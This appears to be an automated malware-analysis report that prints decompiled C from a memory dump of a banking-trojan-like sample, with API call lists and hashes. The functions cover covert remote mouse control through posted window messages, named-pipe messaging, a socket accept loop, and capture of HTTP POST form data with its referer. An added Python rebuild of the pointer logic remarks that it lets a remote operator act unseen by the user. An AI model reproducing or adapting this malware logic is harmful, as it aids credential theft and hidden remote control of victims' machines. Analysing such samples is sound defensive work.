    				void* _t156;
    
    				_t148 = __edx;
    				_t98 = _a4;
    				_t156 = __ecx;
    				_t144 = _a8;
    				_v24 = __edx;
    				_t4 =  &_v24;
    				 *_t4 = _v24 & 0x00000002;
    				_v20 = __edx;
    				 *(__ecx + 0x2c) = _t98;
    				 *(__ecx + 0x2e) = _t144;
    				if( *_t4 == 0) {
    					if((__edx & 0x00000004) != 0) {
    						 *(__ecx + 0x1c) =  *(__ecx + 0x1c) & 0xfffffffe;
    					}
    				} else {
    					 *(__ecx + 0x1c) =  *(__ecx + 0x1c) | 0x00000001;
    				}
    				_v28 = _t148;
    				_t16 =  &_v28;
    				 *_t16 = _v28 & 0x00000008;
    				if( *_t16 == 0) {
    					if((_t148 & 0x00000010) != 0) {
    						 *(_t156 + 0x1c) =  *(_t156 + 0x1c) & 0xfffffffd;
    					}
    				} else {
    					 *(_t156 + 0x1c) =  *(_t156 + 0x1c) | 0x00000002;
    				}
    				_t150 = _t144 & 0x0000ffff;
    				_push(_t150);
    				_t100 = WindowFromPoint(_t98 & 0x0000ffff);
    				_t142 = _t100;
    				if(_t142 == 0) {
    					L36:
    					return _t100;
    				} else {
    					_v88.cbSize = 0x3c;
    					_t100 = GetWindowInfo(_t142,  &_v88);
    					if(_t100 == 0) {
    						goto L36;
    					}
    					_t102 = _a4 & 0x0000ffff;
    					if(_t102 < _v88.rcClient || _t102 > _v60 || _t150 < _v64) {
    						L14:
    						_v5 = 0;
    						goto L15;
    					} else {
    						_v5 = 1;
    						if(_t150 <= _v56) {
    							L15:
    							_t153 = _t150 << 0x00000010 | _t102;
    							_v12 = _t153;
    							if(SendMessageTimeoutW(_t142, 0x84, 0, _t153, 3, 0x12c,  &_v16) == 0) {
    								_v16 = 0;
    							}
    							if(_v16 >= 0x64) {
    								_v16 = 0;
    							} else {
    								_v16 = _v16 & 0x0000ffff;
    							}
    							if(_v5 == 0) {
    								_t100 = _v16 & 0x0000ffff;
    							} else {
    								_t144 = _a4 - _v88.rcClient & 0x0000ffff;
    								_v12 = (_a8 - _v64 & 0x0000ffff) << 0x00000010 | _a4 - _v88.rcClient & 0x0000ffff;
    								_t100 =  *(_t156 + 0x1c);
    							}
    							_a4 = _t100;
    							if((_v20 & 0x00000001) != 0) {
    								E00408A4F(_t142, _v88.dwStyle, _v16, 0x200);
    								_t100 = PostMessageW(_t142, ((0 | _v5 == 0x00000000) - 0x00000001 & 0x00000160) + 0xa0, _a4, _v12);
    							}
    							if(_v24 == 0) {
    								if((_v20 & 0x00000004) != 0) {
    									_t100 = PostMessageW(_t142, ((0 | _v5 == 0x00000000) - 0x00000001 & 0x00000160) + 0xa2, _a4, _v12);
    								}
    							} else {
    								E00408A4F(_t142, _v88.dwStyle, _v16, 0x201);
    								_t100 = E0040899F(((0 | _v5 == 0x00000000) - 0x00000001 & 0x00000160) + 0xa1, _t142, _t144, _t156, _a4, _v12);
    							}
    							if(_v28 == 0) {
    								if((_v20 & 0x00000010) != 0) {
    									_t100 = PostMessageW(_t142, ((0 | _v5 == 0x00000000) - 0x00000001 & 0x00000160) + 0xa5, _a4, _v12);
    								}
    							} else {
    								E00408A4F(_t142, _v88.dwStyle, _v16, 0x204);
    								_t100 = E0040899F(((0 | _v5 == 0x00000000) - 0x00000001 & 0x00000160) + 0xa4, _t142, _t144, _t156, _a4, _v12);
    							}
    							if((_v20 & 0x00000800) != 0 && _v5 != 0) {
    								_t100 = PostMessageW(_t142, 0x20a, (_a12 & 0x0000ffff) << 0x00000010 | _a4 & 0x0000ffff, _v12);
    							}
    							goto L36;
    						}
    						goto L14;
    					}
    				}
    			}

    Instruction addresses: 0x00408ac4 to 0x00408ce4 (per-line address column, separated from the C code by extraction)

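    Added example, not from the sample: the pointer-event translation in E00408AC4 rebuilt in Python so the message arithmetic can be checked. The flag bits (0x1 move, 0x2/0x4 left down/up, 0x8/0x10 right down/up, 0x800 wheel), the MK_* button state kept at offset 0x1c of the context block, the client-area test against rcClient, the handling of the WM_NCHITTEST result and the expression ((in_client == 0) - 1 & 0x160) + base that lifts a WM_NC* id to its client-area WM_* counterpart are taken from the decompiled code; the window rectangle, hit-test values and coordinates are constructed. E00408A4F and E0040899F, which the function calls around the button-down messages, are not modelled.

```python
# Added example: the flag-word to window-message translation in E00408AC4, rebuilt
# in Python so the arithmetic can be checked. The window rectangle and hit-test
# result are constructed; nothing here touches a real window.
WM_NCHITTEST = 0x84
HTCLIENT, HTCAPTION = 1, 2
MK_LBUTTON, MK_RBUTTON = 0x0001, 0x0002

# Bits of the function's flag word (__edx), as tested in the decompiled code.
F_MOVE, F_LDOWN, F_LUP, F_RDOWN, F_RUP, F_WHEEL = 0x1, 0x2, 0x4, 0x8, 0x10, 0x800


def msg_id(base, in_client):
    """((in_client == 0) - 1 & 0x160) + base: inside the client area the WM_NC* base
    is lifted by 0x160 to the client-area WM_* id (0xA1 -> 0x201 and so on)."""
    return ((int(not in_client) - 1) & 0x160) + base


NAMES = {0xA0: "WM_NCMOUSEMOVE", 0xA1: "WM_NCLBUTTONDOWN", 0xA2: "WM_NCLBUTTONUP",
         0xA4: "WM_NCRBUTTONDOWN", 0xA5: "WM_NCRBUTTONUP",
         0x200: "WM_MOUSEMOVE", 0x201: "WM_LBUTTONDOWN", 0x202: "WM_LBUTTONUP",
         0x204: "WM_RBUTTONDOWN", 0x205: "WM_RBUTTONUP", 0x20A: "WM_MOUSEWHEEL"}


class PointerState:
    """Stand-in for the context block at __ecx; offset 0x1c holds the MK_* bits."""

    def __init__(self):
        self.buttons = 0


def translate_pointer(state, flags, x, y, client_rect, hittest, wheel=0):
    """Return the (msg, wParam, lParam) triples the function would post for one
    pointer update. client_rect = (left, top, right, bottom) of the window under
    the cursor (from GetWindowInfo); hittest = what WM_NCHITTEST returned."""
    # Button state is updated before any message is built.
    if flags & F_LDOWN:
        state.buttons |= MK_LBUTTON
    elif flags & F_LUP:
        state.buttons &= ~MK_LBUTTON
    if flags & F_RDOWN:
        state.buttons |= MK_RBUTTON
    elif flags & F_RUP:
        state.buttons &= ~MK_RBUTTON

    left, top, right, bottom = client_rect
    in_client = left <= x <= right and top <= y <= bottom
    hittest = 0 if hittest >= 0x64 else hittest & 0xFFFF
    if in_client:
        # client-relative coordinates, wParam = MK_* state (ctx+0x1c)
        lparam = ((y - top) & 0xFFFF) << 16 | ((x - left) & 0xFFFF)
        wparam = state.buttons
    else:
        # screen coordinates, wParam = hit-test code, as WM_NC* messages expect
        lparam = (y << 16) | x
        wparam = hittest

    out = []
    if flags & F_MOVE:
        out.append((msg_id(0xA0, in_client), wparam, lparam))
    if flags & F_LDOWN:
        out.append((msg_id(0xA1, in_client), wparam, lparam))
    elif flags & F_LUP:
        out.append((msg_id(0xA2, in_client), wparam, lparam))
    if flags & F_RDOWN:
        out.append((msg_id(0xA4, in_client), wparam, lparam))
    elif flags & F_RUP:
        out.append((msg_id(0xA5, in_client), wparam, lparam))
    if flags & F_WHEEL and in_client:
        out.append((0x20A, ((wheel & 0xFFFF) << 16) | (wparam & 0xFFFF), lparam))
    return out


if __name__ == "__main__":
    st = PointerState()
    rect = (100, 50, 500, 350)   # constructed client rectangle
    for flags, pos, ht in ((F_MOVE | F_LDOWN, (120, 80), HTCLIENT),
                           (F_LUP, (120, 80), HTCLIENT),
                           (F_MOVE, (120, 20), HTCAPTION)):
        for msg, wp, lp in translate_pointer(st, flags, *pos, rect, ht):
            print(f"{NAMES[msg]:16} wParam=0x{wp:x} lParam=0x{lp:08x}")
```

    Because the messages are posted rather than injected through SendInput, no cursor moves on the real desktop and nothing reaches a window that is not under the synthetic point; this is what lets the remote operator drive applications without the local user noticing.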

    APIs
    • WindowFromPoint.USER32(?), ref: 00408B18
    • GetWindowInfo.USER32(00000000,?), ref: 00408B34
    • SendMessageTimeoutW.USER32(00000000,00000084,00000000,?,00000003,0000012C,?), ref: 00408B7F
    • PostMessageW.USER32(00000000,-000000A1,?,?), ref: 00408BFE
    • PostMessageW.USER32(00000000,-000000A3,?,?), ref: 00408C56
    • PostMessageW.USER32(00000000,-000000A6,?,?), ref: 00408CAE
    • PostMessageW.USER32(00000000,0000020A,00000800,?), ref: 00408CDA
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: Message$Post$Window$FromInfoPointSendTimeout
    • String ID: <$d
    • API String ID: 32776474-1762099457
    • Opcode ID: 350ce41066c8c6c7661e5dc62eb0dbbba3a20d5c42b7dcbe1faf44b8c56fee3b
    • Instruction ID: 9dc3d389dc38a2338eba9d7f85b420450b9f46f2af1fab54682631787e76ed4b
    • Opcode Fuzzy Hash: 350ce41066c8c6c7661e5dc62eb0dbbba3a20d5c42b7dcbe1faf44b8c56fee3b
    • Instruction Fuzzy Hash: 33619EB1A04208BEEF158FA4CE45BAEBBB4EF44344F04846EF991F5191CB7C9684DB64
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 88%
    			E0040B37A(void* __eflags, long _a4, void _a8, void** _a12, long* _a16, void _a20, void _a24) {
    				char _v5;
    				void _v12;
    				short _v532;
    				long* _t67;
    				void** _t69;
    				long _t70;
    				void* _t71;
    				long _t73;
    				void* _t74;
    
    				_v12 = _v12 | 0xffffffff;
    				_v5 = 1;
    				E0040B088( &_v532, _a4);
    				while(1) {
    					_t71 = CreateFileW( &_v532, 0xc0000000, 3, 0, 3, 0, 0);
    					if(_t71 != 0xffffffff) {
    						break;
    					}
    					if(_v5 != 0) {
    						WaitNamedPipeW( &_v532, 0xffffffff);
    						_v5 = 0;
    						continue;
    					}
    					L23:
    					return _v12;
    				}
    				_a4 = 2;
    				if(SetNamedPipeHandleState(_t71,  &_a4, 0, 0) != 0) {
    					_push(0);
    					_push( &_a4);
    					_t73 = 4;
    					if(WriteFile(_t71,  &_a8, _t73, ??, ??) != 0 && WriteFile(_t71,  &_a24, _t73,  &_a4, 0) != 0 && WriteFile(_t71, _a20, _a24,  &_a4, 0) != 0 && ReadFile(_t71,  &_v12, _t73,  &_a4, 0) != 0 && _a4 == _t73) {
    						_a20 = 0;
    						if(ReadFile(_t71,  &_a20, _t73,  &_a4, 0) == 0 || _a4 != _t73) {
    							_v12 = _v12 | 0xffffffff;
    						} else {
    							_t62 = _a20;
    							if(_a20 > 0) {
    								_t74 = E0040F0A8(_t62);
    								if(_t74 == 0 || ReadFile(_t71, _t74, _a20,  &_a4, 0) == 0) {
    									L19:
    									_v12 = _v12 | 0xffffffff;
    									goto L20;
    								} else {
    									_t70 = _a20;
    									if(_t70 != _a4) {
    										goto L19;
    									} else {
    										_t69 = _a12;
    										if(_t69 == 0) {
    											L20:
    											E0040F0C0(_t74);
    										} else {
    											_t67 = _a16;
    											if(_t67 == 0) {
    												goto L20;
    											} else {
    												 *_t69 = _t74;
    												 *_t67 = _t70;
    											}
    										}
    									}
    								}
    							}
    						}
    					}
    				}
    				CloseHandle(_t71);
    				goto L23;
    			}

    APIs
      • Part of subcall function 0040B088: lstrcpyW.KERNEL32(?,\\.\pipe\), ref: 0040B091
      • Part of subcall function 0040B088: lstrcpyW.KERNEL32(?,?), ref: 0040B09F
    • WaitNamedPipeW.KERNEL32(?,000000FF,?,?,00000000), ref: 0040B3B7
    • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000000,00000000,000000FF,?,?,00000000), ref: 0040B3CF
    • SetNamedPipeHandleState.KERNEL32(00000000,000000FF,00000000,00000000,?,?,00000000), ref: 0040B3EA
    • WriteFile.KERNEL32(00000000,025DF908,00000004,00000002,00000000,?,?,00000000), ref: 0040B406
    • WriteFile.KERNEL32(00000000,00000000,00000004,00000002,00000000,?,?,00000000), ref: 0040B41F
    • WriteFile.KERNEL32(00000000,00000000,00000000,00000002,00000000,?,?,00000000), ref: 0040B439
    • ReadFile.KERNEL32(00000000,00000002,00000004,00000002,00000000,?,?,00000000), ref: 0040B452
    • ReadFile.KERNEL32(00000000,00000000,00000004,00000002,00000000,?,?,00000000), ref: 0040B46F
    • ReadFile.KERNEL32(00000000,00000000,00000000,00000002,00000000,?,?,00000000), ref: 0040B49A
      • Part of subcall function 0040F0C0: HeapFree.KERNEL32(00000000,00000000,0040B690,00000000,00000001), ref: 0040F0D3
    • CloseHandle.KERNEL32(00000000,?,?,00000000), ref: 0040B4D1
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: File$ReadWrite$HandleNamedPipelstrcpy$CloseCreateFreeHeapStateWait
    • String ID:
    • API String ID: 34731080-0
    • Opcode ID: df10f63ff758778fc1cd22f1a60b785de0c2751dd7d6661d3e87381623be594a
    • Instruction ID: 69d50d1413e1f68ad742445ef4237e4b003dba269eebb95cf82bf24da3f336fb
    • Opcode Fuzzy Hash: df10f63ff758778fc1cd22f1a60b785de0c2751dd7d6661d3e87381623be594a
    • Instruction Fuzzy Hash: 3A412672100109BBDB219FA4DC88AEF3A6CEB05754F10817AF915E22D1D734DA85CBA8
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 92%
    			E00408FB6(void* __ebx, void* __ecx, long _a4) {
    				intOrPtr _v8;
    				char _v12;
    				HANDLE* _v16;
    				long _v20;
    				void* _v24;
    				long _v32;
    				void* __edi;
    				void* __esi;
    				void* _t38;
    				long _t42;
    				intOrPtr _t49;
    				long _t57;
    				void* _t58;
    				void* _t73;
    				void* _t75;
    				void* _t78;
    				long _t79;
    
    				_t73 = __ecx;
    				_v12 = _a4;
    				_t79 = 0;
    				E0040F173( &_v32,  &_v32, 0, 0xc);
    				_t38 = CreateEventW(0, 1, 0, 0);
    				_v24 = _t38;
    				if(_t38 == 0) {
    					L26:
    					 *0x416a88 =  *0x416a88 - 1;
    					return 0;
    				}
    				_a4 = 0;
    				E0040F173( &_v20,  &_v20, 0, 8);
    				_t42 = WaitForSingleObject( *0x416a8c, 0);
    				_t75 = 0x102;
    				if(_t42 != 0x102) {
    					L25:
    					SetEvent(_v24);
    					WaitForMultipleObjects(_v20, _v16, 1, 0xffffffff);
    					E004121D7( &_v20);
    					CloseHandle(_v24);
    					goto L26;
    				}
    				_push(__ebx);
    				do {
    					_t49 = E004108D1( &_v12, 0x3e8, _t79);
    					_v8 = _t49;
    					if(_t49 != 0xffffffff) {
    						if(_v32 == _t79 || _v32 == 0xffffffff || _a4 == _t79 || WaitForSingleObject(_a4, _t79) != _t75) {
    							E00412115(_t73,  &_v20);
    							_v32 = _t79;
    							if(E00412183( &_v20,  &_a4, E00408E1C,  &_v32) != 0) {
    								while(_v32 == _t79) {
    									if(WaitForSingleObject( *0x416a8c, 0xc8) != 0x102) {
    										E004108F5(_v8);
    										L24:
    										goto L25;
    									}
    								}
    								if(_v32 == 0xffffffff) {
    									WaitForSingleObject(_a4, 0xffffffff);
    									_a4 = _t79;
    									_v32 = _t79;
    								}
    								goto L16;
    							}
    							_a4 = _t79;
    						} else {
    							L16:
    							if(_a4 == _t79) {
    								L20:
    								E004108F5(_v8);
    								_t79 = 0;
    								goto L21;
    							}
    							_t58 = 0x30;
    							_t78 = E0040F0A8(_t58);
    							if(_t78 == _t79) {
    								goto L20;
    							}
    							E0040F0FC(_t78,  &_v32, 0xc);
    							 *((intOrPtr*)(_t78 + 0xc)) = _v8;
    							if(E00412183( &_v20, 0, E00408CEA, _t78) != 0) {
    								goto L21;
    							}
    							E0040F0C0(_t78);
    						}
    						goto L20;
    					}
    					if( *0x416de4() != 0x274c) {
    						goto L24;
    					}
    					L21:
    					_t57 = WaitForSingleObject( *0x416a8c, _t79);
    					_t75 = 0x102;
    				} while (_t57 == 0x102);
    				goto L24;
    			}

    APIs
    • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,00000000,0000000C), ref: 00408FD6
    • WaitForSingleObject.KERNEL32(00000000,?,00000000,00000008), ref: 00408FFE
    • WSAGetLastError.WS2_32(?,000003E8,00000000), ref: 0040902B
      • Part of subcall function 004108F5: shutdown.WS2_32(?,00000002), ref: 004108FD
      • Part of subcall function 004108F5: closesocket.WS2_32(?), ref: 00410904
    • WaitForSingleObject.KERNEL32(?,00000000,?,000003E8,00000000), ref: 00409055
    • WaitForSingleObject.KERNEL32(00000000), ref: 0040910E
    • SetEvent.KERNEL32(?), ref: 0040912F
    • WaitForMultipleObjects.KERNEL32(?,?,00000001,000000FF), ref: 0040913F
    • CloseHandle.KERNEL32(?), ref: 00409150
      • Part of subcall function 004108D1: accept.WS2_32(00000000,00000000,00000000), ref: 004108EC
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: Wait$ObjectSingle$Event$CloseCreateErrorHandleLastMultipleObjectsacceptclosesocketshutdown
    • String ID:
    • API String ID: 799176206-0
    • Opcode ID: 37ab4d9d2457a534f7b3d6d72b978a92b70925a05b9f64cd2dcf2ab1a869ef2d
    • Instruction ID: 077cfeadb46ef16016e41251fab32098660b998428664a0d07c2bd5fac369b9f
    • Opcode Fuzzy Hash: 37ab4d9d2457a534f7b3d6d72b978a92b70925a05b9f64cd2dcf2ab1a869ef2d
    • Instruction Fuzzy Hash: ED416A31900119EBDF21AF61DC499EFBB79EF05760F118136F514B61E2C7788E828B98
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 80%
    			E0040C290(char __edx, char* __esi, intOrPtr _a4, char _a8) {
    				long _v8;
    				signed int _v12;
    				void* _v16;
    				intOrPtr _v20;
    				char _v60;
    				char* _v64;
    				void _v72;
    				void* _v80;
    				char _v348;
    				void _v1372;
    				void* __ebx;
    				signed int _t94;
    				void* _t111;
    				intOrPtr _t121;
    				int _t131;
    				short _t132;
    				signed int _t133;
    				long _t138;
    				long _t140;
    				char _t141;
    				char _t142;
    				signed int _t143;
    				intOrPtr _t144;
    				intOrPtr _t145;
    				char* _t148;
    				intOrPtr _t153;
    				void* _t154;
    				intOrPtr* _t156;
    				char* _t158;
    				void* _t159;
    
    				_t158 = __esi;
    				_t151 = __edx;
    				_v12 = _v12 | 0xffffffff;
    				_t162 = __esi[0x414];
    				if(__esi[0x414] == 0) {
    					L27:
    					_t82 = _t158[0x42c];
    					if(_t82 > 0x96000) {
    						L66:
    						return 1;
    					}
    					if(_v12 != 0xffff) {
    						L35:
    						_t84 = _t158[0x42c];
    						_t138 = 0;
    						if(_t158[0x42c] <= 0) {
    							L45:
    							_v16 = 0;
    							_v12 = 0;
    							_t153 = 0xc;
    							if(_t158[4] != 0x73 || _t158[5] != 0x3a) {
    								L48:
    								_v20 = 0xb;
    								goto L49;
    							} else {
    								_v20 = _t153;
    								if(_t158[6] == 0x2f) {
    									L49:
    									_push( &_v16);
    									_push( &_v12);
    									E0040601B();
    									if(_v20 == _t153 && _a8 != 0) {
    										 *0x416fe8(0x417030);
    										E0040CE72(_t151, _a4, _t158,  &_v12,  &_v16);
    										 *0x416fec(0x417030);
    									}
    									_v8 = 0x3ff;
    									if(_a8 == 0) {
    										_t142 = _t158[0x424];
    										__eflags = _t142;
    										if(_t142 != 0) {
    											__eflags = _t142 - 0x3ff;
    											if(_t142 <= 0x3ff) {
    												_v8 = _t142;
    											}
    											E0040F0FC( &_v1372, _t158[0x420], _v8);
    											goto L61;
    										}
    									} else {
    										if(HttpQueryInfoA(_t158[0x430], 0x80000023,  &_v1372,  &_v8, 0) == 0) {
    											L57:
    											_v8 = 1;
    											_v1372 = 0x2d;
    											L61:
    											 *((char*)(_t159 + _v8 - 0x558)) = 0;
    											_t154 = E0040F4DC(_t158[0x400], _t158);
    											_t94 = 0x402325;
    											_t143 = _t138;
    											if(_t138 == 0) {
    												_t143 = 0x402325;
    											}
    											_t191 = _v12;
    											if(_v12 != 0) {
    												_t94 = _v12;
    											}
    											_push(_t143);
    											_push(_t94);
    											_push( &_v1372);
    											E0041540F(_t143, _t151, _t191, _v20, _t154, 0, L"%S\nReferer: %S\n%SData:\n\n%S", _t158);
    											E0040F0C0(_t154);
    											E0040F0C0(_v12);
    											E0040F0C0(_t138);
    											goto L66;
    										}
    										if(_v8 != 0) {
    											goto L61;
    										}
    									}
    									goto L57;
    								}
    								goto L48;
    							}
    						}
    						_t138 = E0040F0A8(_t84 + 1);
    						if(_t138 == 0) {
    							goto L66;
    						}
    						E0040F0FC(_t138, _t158[0x428], _t158[0x42c]);
    						_t111 = 0;
    						if(_t158[0x42c] <= 0) {
    							goto L45;
    						} else {
    							goto L38;
    						}
    						do {
    							L38:
    							_t144 =  *((intOrPtr*)(_t111 + _t138));
    							if(_t144 != 0x26) {
    								__eflags = _t144 - 0x2b;
    								if(_t144 == 0x2b) {
    									 *((char*)(_t111 + _t138)) = 0x20;
    								}
    							} else {
    								 *((char*)(_t111 + _t138)) = 0xa;
    							}
    							_t111 = _t111 + 1;
    						} while (_t111 < _t158[0x42c]);
    						goto L45;
    					}
    					if(_t158[0x404] != 0x50 || _t82 < 5) {
    						goto L66;
    					} else {
    						if(_a8 == 0) {
    							_t151 = _t158[0x41c];
    							__eflags = _t158[0x41c];
    							if(_t158[0x41c] == 0) {
    								goto L66;
    							}
    							_push(_t158[0x418]);
    							L34:
    							_t145 =  *0x416c34; // 0x25df5a8
    							_t35 = _t145 + 0x124; // 0x25dffb9
    							if(E0040F547(_t82 | 0xffffffff,  *_t35, _t151) != 0) {
    								goto L66;
    							}
    							goto L35;
    						}
    						_v8 = 0x31;
    						if(HttpQueryInfoA(_t158[0x430], 0x80000001,  &_v72,  &_v8, 0) == 0) {
    							goto L66;
    						}
    						_t151 = _v8;
    						_t82 =  &_v72;
    						_push( &_v72);
    						goto L34;
    					}
    				}
    				_t156 = E00414398( &_v8, __edx, _t162, _a4, 0x4e26, 0x20000000);
    				_v16 = _t156;
    				if(_t156 == 0) {
    					goto L27;
    				}
    				if(E0040F732(_t117, _v8) == 0) {
    					L26:
    					E0040F0C0(_v16);
    					if(_v12 == 0) {
    						goto L66;
    					}
    					goto L27;
    				} else {
    					goto L3;
    				}
    				do {
    					L3:
    					_t8 = _t156 + 1; // 0x1
    					_t148 = _t8;
    					if( *_t148 == 0) {
    						goto L12;
    					}
    					_t121 =  *_t156;
    					_t140 = 0;
    					if(_t121 != 0x2d) {
    						__eflags = _t121 - 0x40;
    						if(_t121 != 0x40) {
    							__eflags = _t121 - 0x21;
    							if(_t121 != 0x21) {
    								goto L11;
    							}
    							_t140 = 1;
    							goto L10;
    						}
    						_t140 = 2;
    						goto L10;
    					} else {
    						_t140 = 3;
    						L10:
    						_t156 = _t148;
    						L11:
    						_t150 = _t156;
    						_t151 = E0040F521(_t156);
    						if(E0040AD1B(_t156, _t122, _t158, _t158[0x400], 0, 0, 2) != 0) {
    							__eflags = _t140 - 1;
    							_v12 = (0 | _t140 != 0x00000001) & 0x0000ffff;
    							__eflags = _t140 - 3;
    							if(_t140 != 3) {
    								__eflags = _t140 - 2;
    								if(_t140 != 2) {
    									goto L26;
    								}
    								_t151 = 0x3c;
    								E0040F173( &_v80,  &_v80, 0, _t151);
    								_v64 =  &_v348;
    								_v80 = _t151;
    								_v60 = 0x103;
    								_t131 = InternetCrackUrlA(_t158, _t158[0x400], 0,  &_v80);
    								__eflags = _t131;
    								if(_t131 == 0) {
    									L22:
    									_t141 = 0;
    									__eflags = 0;
    									L23:
    									_t132 = 0x14;
    									 *0x4167bc = _t132;
    									_t133 = E0040F0C0( *0x4167b4);
    									__eflags = _t141;
    									if(_t141 == 0) {
    										 *0x4167b4 = 0;
    									} else {
    										 *0x4167b4 = E0040F4DC(_t133 | 0xffffffff, _t141);
    									}
    									goto L26;
    								}
    								__eflags = _v60;
    								if(_v60 == 0) {
    									goto L22;
    								}
    								_t141 =  &_v348;
    								goto L23;
    							}
    							__eflags = _a8;
    							if(_a8 != 0) {
    								E0040C616(_t150, _t151, _t158);
    							}
    							return 0;
    						}
    					}
    					L12:
    					_t156 = E0040F750(_t156, 1);
    				} while (_t156 != 0);
    				goto L26;
    			}

    APIs
    • InternetCrackUrlA.WININET(?,?,00000000,?), ref: 0040C390
    • HttpQueryInfoA.WININET(?,80000001,?,?,00000000), ref: 0040C43E
    • RtlEnterCriticalSection.NTDLL(00417030), ref: 0040C522
    • RtlLeaveCriticalSection.NTDLL(00417030), ref: 0040C53A
    • HttpQueryInfoA.WININET(?,80000023,?,?,00000000), ref: 0040C566
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: CriticalHttpInfoQuerySection$CrackEnterInternetLeave
    • String ID: %SReferer: %S%SData:%S$-$1
    • API String ID: 1405552099-909787007
    • Opcode ID: e77a3ed1f073d6d8c8cd5cd0503071004a7d6345dd30cf3b5836450075ef9807
    • Instruction ID: 5080666752fd00d162a1c4ef16dcd805e1b2d05a1706d6d856cae7d05a04730d
    • Opcode Fuzzy Hash: e77a3ed1f073d6d8c8cd5cd0503071004a7d6345dd30cf3b5836450075ef9807
    • Instruction Fuzzy Hash: B7A1D270900248EADF319BA0CCC4BEF7BA9AB44304F24867BE551B62C1D7799A85DB19
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 67%
    			E0040E7EA(void* __eax, void* __ecx, signed int __edx, void* _a4, signed int _a8, signed int _a12) {
    				signed int _v8;
    				void* __edi;
    				void* __esi;
    				signed int _t31;
    				long _t32;
    				DWORD* _t36;
    				void _t38;
    				signed int _t40;
    				signed int _t43;
    				signed int _t44;
    				intOrPtr _t45;
    				signed int _t47;
    				signed int _t55;
    				DWORD* _t58;
    				signed int _t64;
    				char* _t67;
    				void* _t72;
    
    				_t64 = __edx;
    				_t61 = __ecx;
    				_push(__ecx);
    				_t67 = __eax;
    				_t58 = __eax + 0x400;
    				 *_t58 = 0x3fc;
    				if(InternetQueryOptionA(_a4, 0x22, __eax, _t58) == 0) {
    					L21:
    					_t31 = 0;
    					__eflags = 0;
    					L22:
    					return _t31;
    				}
    				_t32 =  *_t58;
    				if(_t32 <= 8) {
    					goto L21;
    				}
    				 *((char*)(_t32 + _t67)) = 0;
    				 *0x416fe8(0x417030);
    				E0040D3EA(_t67,  *_t58);
    				 *0x416fec(0x417030);
    				_t36 = _t67 + 0x410;
    				_t72 = _t67 + 0x404;
    				 *_t36 = 9;
    				if(HttpQueryInfoA(_a4, 0x2d, _t72, _t36, 0) == 0) {
    					goto L21;
    				}
    				_t38 =  *_t72;
    				if(_t38 == 0x47) {
    					L5:
    					if(E004082FB(_t61, _t80, "809dslffsdfsdfgg", _t67, 1) == 0) {
    						_t40 = E00404326(_t61);
    						__eflags = _t40;
    						_v8 = _t40;
    						 *((char*)(_t67 + 0x414)) = _t40 & 0xffffff00 | _t40 != 0x00000000;
    						 *(_t67 + 0x430) = _a4;
    						_t43 = _a12;
    						 *((intOrPtr*)(_t67 + 0x43c)) = 0;
    						 *((intOrPtr*)(_t67 + 0x438)) = 0;
    						__eflags = _t43;
    						if(_t43 == 0) {
    							L11:
    							 *(_t67 + 0x42c) = 0;
    							 *(_t67 + 0x428) = 0;
    							L12:
    							_t44 = E0040C290(_t64, _t67, _v8, 1);
    							__eflags = _t44;
    							if(_t44 == 0) {
    								goto L6;
    							}
    							_t45 =  *0x416c34; // 0x25df5a8
    							_t24 = _t45 + 0x148; // 0x2563e09
    							_t63 =  *_t24;
    							_t65 = E0040F521( *_t24);
    							_t47 = E0040AD1B( *_t24, _t46, _t67,  *_t58, 0, 0, 0);
    							__eflags = _t47;
    							if(_t47 != 0) {
    								_t55 = E0040F244( *_t58, _t67);
    								__eflags = _t55;
    								if(_t55 != 0) {
    									E0040C14A(_t63, E0040C7C1, _t55);
    								}
    							}
    							__eflags =  *((char*)(_t67 + 0x414));
    							if(__eflags != 0) {
    								 *0x416fe8(0x417030);
    								_t60 = _v8;
    								__eflags = E0040D268(_t65, _t67, __eflags, _v8, 0x4e28, 8, 0xa, E0040E458);
    								if(__eflags == 0) {
    									E0040D268(_t65, _t67, __eflags, _t60, 0x4e29, 6, 8, E0040D6EA);
    									E0040D4EC(_t65, _t60, _t67);
    								} else {
    									 *(_t67 + 0x434) =  *(_t67 + 0x434) | 0x00000002;
    								}
    								 *0x416fec(0x417030);
    								E0040F0C0(_t60);
    							}
    							L7:
    							_t31 = 1;
    							goto L22;
    						}
    						_t64 = _a8;
    						__eflags = _t64;
    						if(_t64 == 0) {
    							goto L11;
    						} else {
    							 *(_t67 + 0x42c) = _t43;
    							 *(_t67 + 0x428) = _t64;
    							goto L12;
    						}
    					}
    					L6:
    					 *(_t67 + 0x434) =  *(_t67 + 0x434) | 0x00000004;
    					SetLastError(0x2f78);
    					goto L7;
    				}
    				_t80 = _t38 - 0x50;
    				if(_t38 != 0x50) {
    					goto L21;
    				}
    				goto L5;
    			}

    APIs
    • InternetQueryOptionA.WININET(?,00000022,?,?), ref: 0040E806
    • RtlEnterCriticalSection.NTDLL(00417030), ref: 0040E829
    • RtlLeaveCriticalSection.NTDLL(00417030), ref: 0040E838
    • HttpQueryInfoA.WININET(?,0000002D,?,?,00000000), ref: 0040E859
    • SetLastError.KERNEL32(00002F78), ref: 0040E892
      • Part of subcall function 00404326: CreateMutexW.KERNEL32(00417680,00000000,025DF8B8), ref: 00404341
    • RtlEnterCriticalSection.NTDLL(00417030), ref: 0040E94E
    • RtlLeaveCriticalSection.NTDLL(00417030), ref: 0040E994
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: CriticalSection$EnterLeaveQuery$CreateErrorHttpInfoInternetLastMutexOption
    • String ID: 809dslffsdfsdfgg
